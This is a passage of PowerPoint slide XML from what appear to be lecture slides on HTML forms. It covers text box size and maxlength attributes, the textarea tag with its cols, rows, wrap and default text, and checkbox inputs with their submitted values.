              <a:t>" size="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>maxlength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“ value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute specifies the width of the box (in characters of the current font) as it should appear on the screen, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>maxlength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> specifies the maximum number of characters that a user is allowed to enter into the field.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>The only required attributes are type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, which tells the web browser what type of input to expect, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>and name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, for giving the input a name that will be used to process the field upon receipt of the submitted form.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="169664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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Text areas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When you need to accept input of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>more than a short line of text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, use a text area. This is similar to a text box, but, because it allows multiple lines, it has some different attributes. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>textarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" cols="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>width</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" rows="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>height</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" wrap="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt; &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>textarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The first thing to notice is that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>textarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>has its own tag </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and is not a subtype of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;input&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>tag. It therefore requires a closing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>textarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to end input.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="330342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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instead of a default attribute, if you have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>default text to display</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, you must put it before the closing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>textarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and it will then be displayed and be editable by the user:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>textarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" cols="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>width</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" rows="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>height</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" wrap="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	This is some default text.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>textarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To control the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>width</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>height</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cols</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attributes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="−"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Both use the character </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>spacing of the current font</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to determine the size of the area. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="−"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you omit these values, a default input box will be created that will vary in dimensions depending on the browser used, so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>you should always define them</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to be certain about how your form will appear.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188969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endParaRPr lang="en-US" sz="400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>textarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" cols="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>width</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" rows="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>height</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wrap="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	This is some default text.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>textarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Last, you can control how the text entered into the box will wrap (and how any such wrapping will be sent to the server) using the wrap attribute. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you leave out the wrap attribute, soft wrapping is used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC22E832-0E6D-429A-B256-9E0CF910C949}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1872912" y="4853343"/>
            <a:ext cx="8905016" cy="1888545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1227803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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Checkboxes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When you want to offer a number of different options to a user, from which he can select one or more items, checkboxes are the way to go. Here is the format to use:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;input type="checkbox" name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" checked="checked"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you include the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>checked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute, the box is already checked when the browser is displayed. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The string you assign to the attribute should be either a double quote or the value "checked", or there should be no value assigned. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you don’t include the attribute, the box is shown unchecked. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="58525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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Here is an example of creating an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>unchecked box</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I Agree &lt;input type="checkbox" name="agree"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the user doesn’t check the box, no value will be submitted. But if he does, a value of "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" will be submitted for the field named agree. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you prefer to have your own value submitted instead of the word </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(such as the number 1), you could use the following syntax:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I Agree &lt;input type="checkbox" name="agree" value="1"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
